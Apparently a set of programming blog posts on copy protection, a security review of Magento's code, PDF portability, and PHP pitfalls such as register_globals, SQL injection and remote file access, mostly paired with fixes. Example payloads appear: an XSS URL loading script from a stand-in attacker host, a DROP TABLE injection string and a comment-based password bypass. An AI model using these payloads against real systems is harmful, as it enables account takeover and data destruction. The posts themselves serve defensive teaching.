All of these are annoying to the user even when they work correctly (can you back up your Wii games, or play single player Portal without an internet connection?), and can be downright damaging to your reputation if you push things too far. In fact, customers have regularly managed to pressure the copy protection away.

What else?

One solution increasingly used by many developers is to go online. You cannot crack World of Warcraft, because the code that runs the game servers … runs on the game servers! If you have no access to code, you cannot make it act differently. So, short of knowing the login/password to an account that was paid for, you cannot connect to the game servers. And, best of all, this kind of protection doesn’t even feel like protection to users: it’s perfectly normal to have to provide a login/password to connect to a multiplayer game (otherwise, how would the game know who you are and who your characters are?) and no one would give away their login/password online because their account might be stolen by others.

So, if you can move any significant part of your operation online, you can have your customers pay for that part (whether this means anti-virus updates, video game servers or content) and it will both feel natural and be immune to cracking.

If we were to broaden these definitions, we could say that anything you can offer which makes the software more valuable is something you can sell. A lot of open source software works this way: you can download our program for free, and if you have any trouble using it or extending it, we’ll be happy to provide help for a fee!

But there’s something else. Something that has to do with how people cheat and steal when they think they can get away with it, unless you remind them that stealing is bad.

A three-step approach

Suppose that your program does not have anything to offer online: updates happen few and far between, there’s no online content and no support. It’s just a simple, ten-dollar tool. You’re not going through a retailer either: you’re small, so you sell your software online, and you cannot rely on any physical security (such as a dongle or a CD). You have three objectives:

  1. To create and amplify the incentives to buy.
  2. To prevent the customers from redistributing their software.
  3. To prevent the prospects from downloading a free version.

What kind of copy protection do you include?

I would say, none, and make this statement on the sales website:

No Copy Protection

We decided not to include any kind of copy protection in FooBar™. Copy protection always ends up causing trouble to legitimate customers: we don’t want you to remember a registration key, keep your computer connected to the internet or give us a call when you buy a new computer.

We strongly believe that if you paid for it, then you should be able to use it: restricting what you can do with your software is just as bad as downloading paid software for free.

Unlimited Downloads

Once you buy FooBar™, you can download it as many times as you want, and install it on any number of computers you own: just connect to your online account and you will have unlimited access to the latest version of FooBar™.

Warning: revealing your account number and password or giving out your copy of FooBar™ may let other people connect to your control panel and steal the account by changing the password.

What does this message achieve?

  • The absence of copy protection is used as a feature: if you do it, you might as well get a few sales from it. This part is a promise: you won’t be having these issues with our product. Objective 1.
  • The “we strongly believe” part creates a connection with the reader, and shows that we think about their satisfaction instead of our money. It also stealthily introduces the concept that “downloading software for free” is bad. So, if the reader was considering looking for a free torrent of the software, they will feel queasy because it’s “bad”, and because it feels like betraying us when we’ve done so much for them. Objective 3 (and, for a small part, 2).
  • It goes one step further and lets you download and install the software as many times as necessary with no restrictions. If this feature were presented on its own, it would probably feel out of place: people don’t need that. But by placing it right after our copy protection discourse, it actually feels like a natural consequence: “not only do we let you install your software as you wish, but we actually help you do so by providing you with a download”. Objective 1.
  • It warns against the consequences of redistributing FooBar not in terms of “you’re an evil cracker” (accusing prospects of anything is a bad way to turn them into customers), but rather in terms of “evil persons could steal the software from you”. We rely on loss aversion to have people avoid losing a service that, while useful, isn’t necessary for them to use the software, but we also expect smarter customers to infer that if evil thieves can determine the account number from the executable, so can we. Objective 2.

All you need to make this seem plausible is a watermarking process: when someone downloads the software, you give them a copy of the executable that contains the account number and the name of the buyer (readily available in, say, a “Licensed to:” subsection on the “About” menu). The crack in itself isn’t exceedingly difficult to perform: just get a legal version and either distribute it for free or remove the buyer’s name if you wish to protect him.
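A minimal sketch of such a watermarking step, assuming the shipped executable reserves a fixed-size placeholder that the download script overwrites. The placeholder constant, the function name and the label format are all hypothetical:

```php
<?php
// Hypothetical placeholder compiled into the executable; the download
// script overwrites it with the buyer's details.
const WATERMARK_SLOT = '%%LICENSED-TO-PLACEHOLDER-0000000000000000000000000000000000%%';

function watermark_binary(string $binary, string $account, string $buyer): string
{
    $slotLength = strlen(WATERMARK_SLOT);
    $label = 'Licensed to: ' . $buyer . ' (#' . $account . ')';
    if (strlen($label) > $slotLength) {
        throw new LengthException('Licence label does not fit in the reserved slot');
    }
    if (substr_count($binary, WATERMARK_SLOT) !== 1) {
        throw new RuntimeException('Expected exactly one watermark slot');
    }
    // Pad with NUL bytes so the file size and every offset stay unchanged.
    $padded = str_pad($label, $slotLength, "\0");
    return str_replace(WATERMARK_SLOT, $padded, $binary);
}
```

Keeping the replacement the same length as the placeholder means the rest of the executable does not have to be touched, which is also why removing the name is an easy crack.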

There’s another way to fight towards objective 3. Where do most people look for pirated software? Peer-to-peer networks, torrent search engines, and the classic search engines. So, if you manage to publish enough incorrect “free versions”, an actual free version might end up being too hard for people to find. If your software does cost $10, how long do you expect people to spend looking for a free version? Not long. $10 is what many people spend for lunch.

Hacking Magento

My evil hacker side is rampaging the virtual countryside again. This time, I’m scanning Magento for exploits and vulnerabilities.

If you like what you see here, or if you’re interested in more details about Magento, the web or the business of earning money online, make sure you subscribe to my RSS feed to keep up with the latest articles on the topic.

Anyway, let’s start with the easy stuff.

Eval

Once I download the code, the first step is to look for classic bug-prone functions. One example is the ‘eval’ function, which executes an arbitrary string as PHP code. Were such a function present in the codebase, I could look for ways of subverting the input string so that I can insert my own code in there and take control of the server.

A quick search of the code yields only two uses of ‘eval’, both of them in a google cart function that was deprecated because it was using ‘eval’:

if($value == "true" || $value == "false")
  eval('$this->'.$string.'="'.$value.'";');
else
  eval('$this->'.$string.'="'.$default.'";');

I scan for uses of that function (just in case someone ignored the deprecation) and get no results. Well, that particular exploit won’t be available here.
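For comparison, the same assignment can be written without ‘eval’ by using a variable property name. This is only a sketch: the class, the property and the method name are made up for illustration and are not Magento code.

```php
<?php
class CartOptions
{
    public $enabled = 'false';

    // Same effect as eval('$this->'.$string.'="'.$value.'";'), but the
    // strings are never parsed as PHP code.
    public function setOption(string $string, string $value, string $default): void
    {
        if (!property_exists($this, $string)) {
            throw new InvalidArgumentException('Unknown option: ' . $string);
        }
        $accepted = ($value === 'true' || $value === 'false');
        $this->{$string} = $accepted ? $value : $default;
    }
}
```

With this form, a value such as `"; phpinfo(); "` is just a string that fails the check, not code waiting to be executed.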

Exec

Another way is the classic family of shell execution functions: ‘exec’, ‘shell_exec’ and ‘passthru’, as well as the backtick operator that I’ve never actually seen used anywhere. These functions take a string argument and run it as a command on the server. Of course, this requires that the server is not secure and allows arbitrary execution of commands, but at least one server on the internet is bound to have this safety issue and run Magento.

So, if I could then corrupt the arguments to that call, I could have the server run what I want (usually, it would be downloading a PHP file from my own evil server and running that file with a direct query).

The basic ‘exec’ comes up as part of PEAR, mostly with constant string arguments, so no cookie there.

As for ‘shell_exec’, it comes up in Zend for the console adapter (that no sane person would use on the web), also with constant string arguments.

Finally, ‘passthru’ does not come up anywhere.

So, there’s nothing this way either.
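Had one of these calls taken user input, the usual defense would be to quote every argument before it reaches the shell. A small sketch, assuming a Unix-like server; the wrapper name and the grep command are hypothetical, while escapeshellarg is the standard PHP function:

```php
<?php
// Hypothetical wrapper: build a command line whose arguments cannot break
// out of their quotes and start a second command.
function build_grep_command(string $needle, string $file): string
{
    return 'grep -c -- ' . escapeshellarg($needle) . ' ' . escapeshellarg($file);
}
```

The resulting string can be handed to ‘exec’; a needle such as `foo; rm -rf /` then stays a single, harmless argument.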

SQL Injection

If I can’t take control of the server directly, I could at least get into the site admin, for instance by extracting the admin password from the database (or inserting my own in its place, if it’s encrypted). With access to the back-end, I could upload evil PHP files and get control anyway. So, I could try hammering the database with injection requests.

A quick search for “SELECT … FROM” yields no interesting results (all of them are within Zend, and I’m not going to look for exploits within Zend today). This means that Magento is using Zend for handling requests (by use of Zend_Db_Table and the related classes) in order to reduce the probability of SQL injection. So far so good, but even Zend doesn’t eliminate the risk of SQL injection completely.

For instance, Zend relies on providing variables as arguments to its functions so that it can escape them itself. So, one would do (to build the ‘where’ part of a query):

$select -> where('parent_id > 0 AND user_id = ?', $userId);

But looking at a Magento file (one that’s part of the external API, and handles the users to the API) I find instead:

$select -> where("parent_id > 0 AND user_id = {$user_id}");

This code inserts the text value of $user_id directly into the request without any escaping or even checking, which makes it a possible vulnerability against SQL injection. This is getting exciting: can I alter $user_id to get the request to do nasty things? Nope. Even though the SQL statement itself is risky, the variable is protected:

if (is_numeric($user)) {
  $userId = $user;
} else if ($user instanceof Mage_Core_Model_Abstract) {
  $userId = $user->getUserId();
} else {
  return null;
}

There are around 90 occurrences of a “where” clause that contains an interpolated string within Magento. Every one of them is a potential security issue. All of them seem to be secured by argument verification, though.
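A search like this one can be roughly automated. The sketch below is an assumption about how one might do it, not the tool actually used here: it flags lines where a where(...) call receives a double-quoted string containing a variable, and it will miss clauses that span several lines or are built by concatenation.

```php
<?php
// Return the 1-based line numbers of $source on which a where(...) call is
// given a double-quoted string that contains a PHP variable.
function find_interpolated_where(string $source): array
{
    $hits = [];
    foreach (explode("\n", $source) as $i => $line) {
        if (preg_match('/->\s*where\s*\(\s*"[^"]*\$/', $line)) {
            $hits[] = $i + 1;
        }
    }
    return $hits;
}
```

Each hit still has to be read by hand to see whether the interpolated variable is validated before use.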

Password Retrieval

Another way of gaining access to the administration panel is simply by getting the password. Joomla! had a vulnerability in this area not so long ago, for instance. Magento uses a fairly straightforward controller dispatch scheme, meaning that the “/admin/index/forgotpassword/” URL maps to the function “forgotpasswordAction()” in the file “AdminHtml/controllers/IndexController.php”.

Peeking at the code for that function, I soon notice there’s no way I can get through. Unlike in Joomla!, the password is not set by the user, but rather re-generated by the server and sent back to the user. I can’t even insert my own email to receive the password: sending happens using a specific function that uses the user’s own e-mail address.

$user->sendNewPasswordEmail();

Another technique would be to somehow predict what password was generated by the server and plug it back in to connect. The password is generated as such:

$pass = substr(md5(uniqid(rand(), true)), 0, 6);

Now, that’s quite interesting. The server first generates an md5 hash: the characters inside the hash are, for practical purposes, unpredictable (unless I can somehow identify the state of uniqid and rand when I performed the re-generation, which is hard to do from the outside, although neither function is cryptographically secure). Then, it selects the first 6 characters of the hash and uses them as the password. This means that the password contains six hexadecimal digits: there are about 16 million possible passwords there, which is far weaker than a 6-character alphanumeric password (about 57 billion possible passwords) and ridiculous when compared with an 8-character password containing letters, digits and punctuation (about 6 million billion possible passwords).
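The sizes of these password spaces are easy to recompute. In the sketch below, the alphabet sizes are my assumptions: 16 hexadecimal digits, 62 letters and digits, and 94 printable ASCII characters excluding the space.

```php
<?php
// Number of distinct passwords for a given alphabet size and length.
function password_space(int $alphabetSize, int $length): int
{
    return $alphabetSize ** $length;
}

echo number_format(password_space(16, 6)), "\n"; // six hex digits
echo number_format(password_space(62, 6)), "\n"; // six letters or digits
echo number_format(password_space(94, 8)), "\n"; // eight printable ASCII characters
```

The three results are roughly 16.8 million, 56.8 billion and 6.1 million billion.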

Of course, this is nothing groundbreaking: 16 million possible passwords is plenty to be safe, especially since they’re randomly chosen and therefore impossible to guess without full brute-force. Besides, to do it, you would need to know the administrator username and email (which can be obtained through a minimal amount of social engineering).

Either way, an improved password-generation method would be to use base64_encode to draw from a 64-character alphabet (letters, digits, ‘+’ and ‘/’) instead of just hex passwords like the above:

$pass = substr(base64_encode(md5(uniqid(rand(), true), true)), 0, 6);

This raises the number of possible passwords to about 69 billion (64 to the power of 6), which is beyond brute-force.
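On PHP 7 and later, a different approach is to pick each character with random_int, which draws from the system’s cryptographically secure generator. This is a sketch of that alternative, not what Magento does; the function name and the alphabet are assumptions.

```php
<?php
// Assumes PHP 7+, where random_int() uses the operating system's CSPRNG.
function generate_password(int $length = 6): string
{
    $alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
    $max = strlen($alphabet) - 1;
    $pass = '';
    for ($i = 0; $i < $length; $i++) {
        // Each character is chosen independently and uniformly.
        $pass .= $alphabet[random_int(0, $max)];
    }
    return $pass;
}
```

Raising the default length costs nothing and enlarges the search space far more than changing the alphabet does.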

This doesn’t eliminate the annoyance of changing the password without a confirmation e-mail: as soon as you know the administrator’s mail, you can generate a new password as often as you want, and you can even do it fast enough to make the “read password from mail and write password in box” process too slow to use the latest password, or even have the mail-sending script burst (because it’s blacklisted for flooding, for instance) and leave the user with no password.

Invalid Assumption

Yesterday, I stumbled across a DailyWTF article that showed overlooked errors, unusual bugs and other incorrect statements. At the bottom, a screenshot of a PDF containing a State of Georgia Department of Revenue form, with detailed instructions explaining how to download Adobe Reader. The irony of a document containing instructions on how to open it (something which would have already happened by the time the user read the instructions) is the reason for including that document on the DailyWTF website.

Is it really that obvious?

The Portable Document Format

Suppose for a moment that you’re not the Windows-using experienced developer you are (or you might be, if you read this blog or the DailyWTF). Perhaps you’re a hardcore Linux user who opens his Portable Document Format with xpdf instead of Adobe Reader (the document being portable is quite the point of the format). Or you might be using OS X. Or perhaps you’re running some older version of Adobe Reader than the 8.0 in the document.

This is where the real irony begins—despite being an open standard, advertised as being portable, PDF is not really that portable. Sure, you can open old PDF documents on any operating system with a large variety of readers from Adobe’s own to xpdf to evince to flash-based readers (courtesy of pdf2swf), not including the various conversion tools (to PostScript, to a bunch of PNG images, to HTML, to plain text).

But later versions of the PDF standard have introduced many features that few readers (aside from Adobe Reader) manage to support.

Taking a look at the standard (there’s a free version on Adobe’s web site) is an enlightening experience: what used to be a simplification of PostScript (mostly, removing the Turing-complete parts of the language) has now included the ability to carry SWF, JavaScript for manipulating a DOM-like construct, user-entered data, digital signatures, and many other elements.

Consider, for instance, the ability to fill in a form in a PDF document. Chapter 12 in the PDF 1.7 standard tells us that this feature has existed since PDF 1.2 (released in 1996 with Adobe Acrobat Reader 3.0). Obviously, most non-interactive renderers (such as converters) don’t support interactive features in PDF documents, of which forms are a part. But that’s also the case for some interactive viewers: xpdf, kpdf and evince users will see the form, but will not be able to fill it in.

Of particular interest is the way in which Adobe benefits from the wide distribution of its Adobe Reader, even though it is provided free of charge to anyone who wishes to download it. Aside from the elementary document-displaying functionality, which is reasonably well duplicated by other readers (including those from the Open Source world), Adobe Reader provides several pieces of locked functionality. Among these:

  • Saving a modified PDF file to the disk (including form field contents).
  • Applying a digital signature to a PDF file using the reader.
  • Sending a PDF file by e-mail from the reader (again, including form field contents).

The reader provides this functionality whenever it reads an “enabled” PDF file. One way of enabling files is to use the LiveCycle Reader Extensions service (that tends to cost quite a lot), another is the smaller-scale Adobe Acrobat Pro (a bit cheaper, but limited to 500 readers).

But wait, you think, if the format is open and the enabled/disabled status is part of the file, surely an open source PDF writer could enable files for free? Sadly, no, they couldn’t. While some features (such as signing a document outside of Adobe Reader) can be performed by anyone, enabling files cannot. To check if a file is enabled, Adobe Reader will determine whether the creator has signed the file with an appropriate private key—the details are a bit more complex, but that’s the idea—and so to enable a file you need that private key.

In short, Adobe is using a shareware-like model for distributing the Adobe Reader: you get a basic version for free, but to access the advanced features you have to pay. The difference with the standard shareware model is that “you”, in the above sentence, is not the user of the Adobe Reader software, but rather the author of the PDF that is read by that software.

What Does This Teach Us?

Two things:

  • Most assumptions that hold on an individual basis (on my computer, I use Acrobat Reader to open PDF documents) do not carry over well to other people. This is what leads to the “doesn’t work on other machines” portability issue, as well as many security issues when people cannot imagine that a hacker is going to use their program or website in a way they did not intend.
  • When someone does notice that an assumption is incorrect, and adds code to handle it, readers of that code will seldom understand on the first try what assumption is incorrect (precisely because, as an assumption, it is thought to be correct). Therefore, code handling some obscure detail will be thought of as redundant and silly if it is not accompanied by a comment explaining why it’s actually necessary and not redundant.

The portability issue is annoying, but not horrible. After all, if you make an assumption that hinders portability, you will be woefully aware of that once you actually try to perform the port. By contrast, security issues are far more annoying. The classic issue would be SQL injection:

mysql_query("SELECT * FROM `users` ".
            "WHERE `id` = ".$_GET['user']." AND `password` = ".$_GET['pass']);

This code assumes that the GET-parameter will always be a valid user identifier. This may be fine if the visitors always come to the page after clicking on a link that contains a valid GET-parameter, but even an average hacker can forge an HTTP GET request with an invalid GET-parameter such as “?user=13--” (this selects user 13 without password checks).
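To see the effect without a database, the sketch below rebuilds the query string from a forged request and adds a hypothetical check that only lets plain integers through. Both function names are mine.

```php
<?php
// Reproduces the string concatenation of the vulnerable snippet.
function build_login_query(array $get): string
{
    return "SELECT * FROM `users` "
         . "WHERE `id` = " . $get['user'] . " AND `password` = " . $get['pass'];
}

// Hypothetical guard: accept the parameter only if it is a plain integer.
function validated_user_id(array $get): ?int
{
    $id = filter_var($get['user'] ?? null, FILTER_VALIDATE_INT);
    return $id === false ? null : $id;
}
```

Calling build_login_query(['user' => '13--', 'pass' => 'x']) yields a statement in which everything after `13` is an SQL comment, whereas validated_user_id rejects the same input and returns null. Validation of this kind only covers the numeric identifier; the password still has to go through a parameterized query.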

As for assuming that people are incorrect, I’d say there are three kinds of developers:

  1. The young developer, who trusts everyone and accepts all the code as if it had been written by omniscient brain-gods.
  2. The experienced developer, who has learned that other developers are incompetent and warily examines all code as if it had been written by an epileptic chimpanzee.
  3. The wise developer, who has gone beyond mistrust into deep paranoia, and warily examines all code as if it had been written by a sworn rival out to get him by placing devious traps in everything he commits.

Type 1 never notices bugs. Type 2 treats genuine corrections as bugs. Type 3 just spends too much time cross-checking everything to do any kind of work.

No single type is perfect, and in every team there will be a type that will be better than the others. If your team is highly competent, be a type 1 developer. If your team is highly incompetent, be a type 2 developer. If your team is a sworn rival out to get you, be a type 3 ;-)

More is Worse

Countless stories and folk tales relate the story of a man who sought or otherwise found boundless power, which proved too much to handle and ultimately destroyed him. Yet, what brought most of us to programming is the unmistakable feeling of omnipotence, the ability to make the machine do anything one desires provided that one can explain how to do it.

And, inevitably, the bitter taste of experience teaches us that omnipotence is the greatest curse that has ever befallen the computer programmer or the system administrator, leaving us to face the new generation of programmers who delight in the latest programming language version of the swiss army knife, favoring expressiveness over safety and security.

Much to my delight, PHP has been a historical breeding ground for such low-safety, low-security, low-verbosity solutions.

Automatic global variables

Perhaps the oldest and most delicate security issue in PHP was the automatic registration of request arguments as global variables. Consider the simple PHP script that displays a countdown in bold and italics:

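// $count arrives from the request as a string, so check that it is numeric
assert (is_numeric($count));

// $result is deliberately left uninitialized, as in the original style
while ($count > 0)
  $result .= strval($count--) . ", ";

$result .= "Fire!";

echo '<p>In bold: <b>'.$result.'</b>.</p>';
echo '<p>In italics: <i>'.$result.'</i>.</p>';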

This snippet uses two common productivity-enhancing features of the earlier PHP incarnations: the fact that variables could be used without being initialized (so $result is initially null, implicitly converted to the empty string, and then used) and the automatic registration of variables, allowing $count to equal what is now known as $_REQUEST['count'] (which could be provided, for instance, by accessing http://example.com/script.php?count=3).

Obviously, this creates huge vulnerabilities. For instance, a short piece of code such as the one above could very well contain an XSS (cross-site scripting) vulnerability! It’s enough for an attacker to find out that the script uses a variable named $result (fairly easy with open source software) and provide an initial value for it, for instance injecting some JavaScript on another page. The victim would be vulnerable when following a URL such as:

http://example.com/script.php?count=0&result=<script src=http://haxor.com/hax.js></script>

Now that the attacker has injected arbitrary JS in the victim’s browser on the page that is being attacked, he can do anything as if he were the victim, using the victim’s session on the target site.
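A defensive version of the countdown might look like the sketch below: the request value is read explicitly, the accumulator is initialized, and the output is escaped. The function name and the decision to pass the request in as an array are assumptions made so that the example is self-contained.

```php
<?php
function render_countdown(array $request): string
{
    // Read the one expected parameter explicitly and force it to an integer.
    $count = (int) ($request['count'] ?? 0);
    // Initialize the accumulator so nothing from the request can seed it.
    $result = '';
    while ($count > 0) {
        $result .= strval($count--) . ', ';
    }
    $result .= 'Fire!';
    // Escape before output, even though the content is now under our control.
    $safe = htmlspecialchars($result, ENT_QUOTES, 'UTF-8');
    return '<p>In bold: <b>' . $safe . '</b>.</p>';
}
```

With this version, a forged `result` parameter is simply ignored, because the script never reads it.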

Needless to say, PHP has since restricted automatic global registration to contain this evil: register_globals has been off by default since PHP 4.2 and was removed in PHP 5.4.

SQL Queries

Yet another high-productivity improvement in PHP is its tight connection with the MySQL database management system. In the good old days when “real programmers” had to update an account balance in a database, they would write a stored SQL procedure which received the account balance as an argument and performed the correct manipulation, then they would write some web server code that connected to the database and called that stored procedure.

PHP allows its users to brutally shorten the amount of work necessary for that:

function update_balance($id, $amount)
{
  mysql_connect();
  mysql_query(
    "UPDATE accounts " .
    "SET balance = balance + $amount " .
    "WHERE id = $id");
}

This code works by generating an SQL query as a string, then sending that query over the connection to the MySQL database manager, which runs it as-is. This code contains a classic SQL injection vulnerability, where the attacker provides values of the $id or $amount variables that generate malicious SQL code. For instance, providing $amount = “0; DROP TABLE accounts; --” and $id = 0 results in the generated (and executed) SQL statements:

UPDATE accounts SET balance = balance + 0;
DROP TABLE accounts;
-- WHERE id = 0

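Of course, this assumes that there are no other safety rules that filter out invalid values for $amount or $id (which must be integers), and that the database layer accepts several statements in one call. mysql_query itself does not, so against it an attacker would rather bend the single UPDATE, for instance with $id = “0 OR 1=1”. But when the data being stored is a bit of text, which should be stored as-is regardless of what it contains, the safety checks disappear and the vulnerability becomes apparent (and often exploited, sometimes in the least expected ways).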

There are certainly workarounds for this, the first of them being mysql_real_escape_string, which eliminates the risk of injection for quoted values, provided that it is used, and it’s easy to forget to use it (not to mention the overhead of using it). Many frameworks provide their own version of a query generator that automatically escapes query arguments. My own mini-framework involves:

$link = mysql_connect();
qprintf(
  $link, 
  "UPDATE accounts "
  . "SET balance = balance + {0} "
  . "WHERE id = {1}", 
  $amount, $id);

And the Zend Framework involves:

$select = $this
  -> select()
  -> where('id = ?', $id);

$row  = $this -> fetchRow($select);
$data = array('balance' => $row -> balance + $amount);

$where = $this
  -> getAdapter()
  -> quoteInto('id = ?', $id);

// Pass the $data array built above (not an undefined $array)
$this
  -> update($data, $where);

To account for the unsafety of the short version, more code has to be added.
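To give an idea of what such a query generator does internally, here is a minimal sketch of a placeholder formatter. It is not the qprintf shown above nor Zend’s implementation: the function name is hypothetical, and the quoting routine is passed in by the caller on the assumption that it wraps a real driver function such as PDO::quote.

```php
<?php
// Hypothetical formatter: replaces {0}, {1}, ... with the matching argument.
// Integers are inserted as numbers; everything else goes through $quote.
function format_query(string $template, array $args, callable $quote): string
{
    return preg_replace_callback(
        '/\{(\d+)\}/',
        function (array $m) use ($args, $quote): string {
            $index = (int) $m[1];
            if (!array_key_exists($index, $args)) {
                throw new OutOfRangeException('No argument for placeholder ' . $m[0]);
            }
            $value = $args[$index];
            if (is_int($value)) {
                return (string) $value;
            }
            // Anything that is not a genuine integer is treated as text.
            return $quote((string) $value);
        },
        $template
    );
}
```

With a PDO connection in $pdo, the call would be format_query($sql, [$amount, $id], [$pdo, 'quote']). The extra code is the price of never letting a raw request value reach the query text; prepared statements achieve the same on the database side.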

Remote file access

In the beginning, accessing a remote file (for instance, at the other end of an http:// address) in PHP was a difficult task that involved manually connecting to the server to fetch the file (using cURL, for instance).

Then, the elementary file-opening function fopen gained the ability to open remote files with several protocols (and the possibility to add more). Suddenly, the old fifteen-line routine for reading the contents of an RSS feed became as simple as readfile("http://example.com/rss.php"), and there was much rejoicing.

One thing led to another, and code using that feature began to multiply using patterns such as these:

function display_quoted($url)
{
  print '<blockquote>';
  @readfile($url);
  print '</blockquote>';
}

Except that, while readfile documented that it could open both local and remote files, display_quoted only documents that it can open remote files. And when a local path is passed to display_quoted, well, you’ve just output config.inc.php and the database passwords that were hidden in there.

The solution, of course, is to distinctly separate functions which operate on local files from functions which operate on remote files. It’s certainly possible to keep on using readfile to perform remote access, but additional checks should be made to guarantee that it’s performing remote access and not local access.
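One possible form for that additional check is sketched below. The helper name is hypothetical, and restricting the function to http and https is my assumption about what “remote” should mean here; it does not stop a URL that points back at the server itself.

```php
<?php
// Accept only absolute http(s) URLs; local paths and other stream
// wrappers (file://, php://, ...) are refused.
function is_remote_url(string $url): bool
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    $host   = parse_url($url, PHP_URL_HOST);
    return is_string($scheme)
        && in_array(strtolower($scheme), ['http', 'https'], true)
        && is_string($host) && $host !== '';
}

function display_quoted(string $url): void
{
    if (!is_remote_url($url)) {
        throw new InvalidArgumentException('display_quoted only accepts http(s) URLs');
    }
    print '<blockquote>';
    readfile($url);
    print '</blockquote>';
}
```

Throwing instead of silently printing nothing makes the misuse visible to whoever passed a local path by mistake.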


